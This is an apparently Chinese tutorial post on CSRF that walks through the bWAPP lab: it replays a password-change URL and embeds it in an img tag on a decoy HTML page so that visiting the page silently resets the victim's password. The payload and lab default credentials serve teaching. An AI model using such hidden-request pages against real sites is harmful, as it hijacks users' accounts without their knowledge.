小课堂 -- CSRF漏洞介绍

简介: 小课堂 -- CSRF漏洞介绍

CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作

 

CSRF和XSS区别:

1、CSRF需要登陆后操作,XSS不需要

2、CSRF通过伪装成受信任用户请求受信任的网站

 

一、环境:BWAPP

 

二、登陆,默认账号为:bee,密码为:bug

image.png

三、选择从在csrf的页面,将密码修改为1111,change

image.png

 

四、分析url

http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change

 

五、退出账号,重新登陆一下,密码已经修改为1111

 

六、重修修改一下url,直接访问这个这个地址,

http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change

密码被重置为2222

 

七、隐蔽利用

1、新建一个html页面,将url地址重新修改一下,添加到img标签下的src属性,

<!DOCTYPE html> <html> <head> <title>哎呦不错哦。。。</title> </head> <body> <h2>好久不见<h2> <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change"> </body> </html>

2、访问这个html,自动访问修改后的url,密码也自动修改了

 

禁止非法,后果自负

目录
打赏
0
0
0
0
115
分享
相关文章
CSRF漏洞利用工具 -- CSRFTester
CSRF漏洞利用工具 -- CSRFTester
303 0
31、CSRF漏洞介绍
31、CSRF漏洞介绍
52 0
互联网并发与安全系列教程(06) - 常见的Web安全漏洞(CSRF攻击)
互联网并发与安全系列教程(06) - 常见的Web安全漏洞(CSRF攻击)
142 0
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
Web漏洞挖掘:XSS与CSRF防护策略
【7月更文挑战第11天】XSS和CSRF作为Web应用中常见的安全漏洞,对系统安全构成了严重威胁。通过实施上述防护策略,可以有效减少这些漏洞的风险。然而,Web安全攻防是一个持续不断的过程,开发者需要持续关注应用的安全性,更新和修补安全漏洞,同时加强自身的安全意识和防范技能,以确保Web应用的安全性和稳定性。
第二轮学习笔记:CSRF跨站请求伪造漏洞
第二轮学习笔记:CSRF跨站请求伪造漏洞
60 0
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等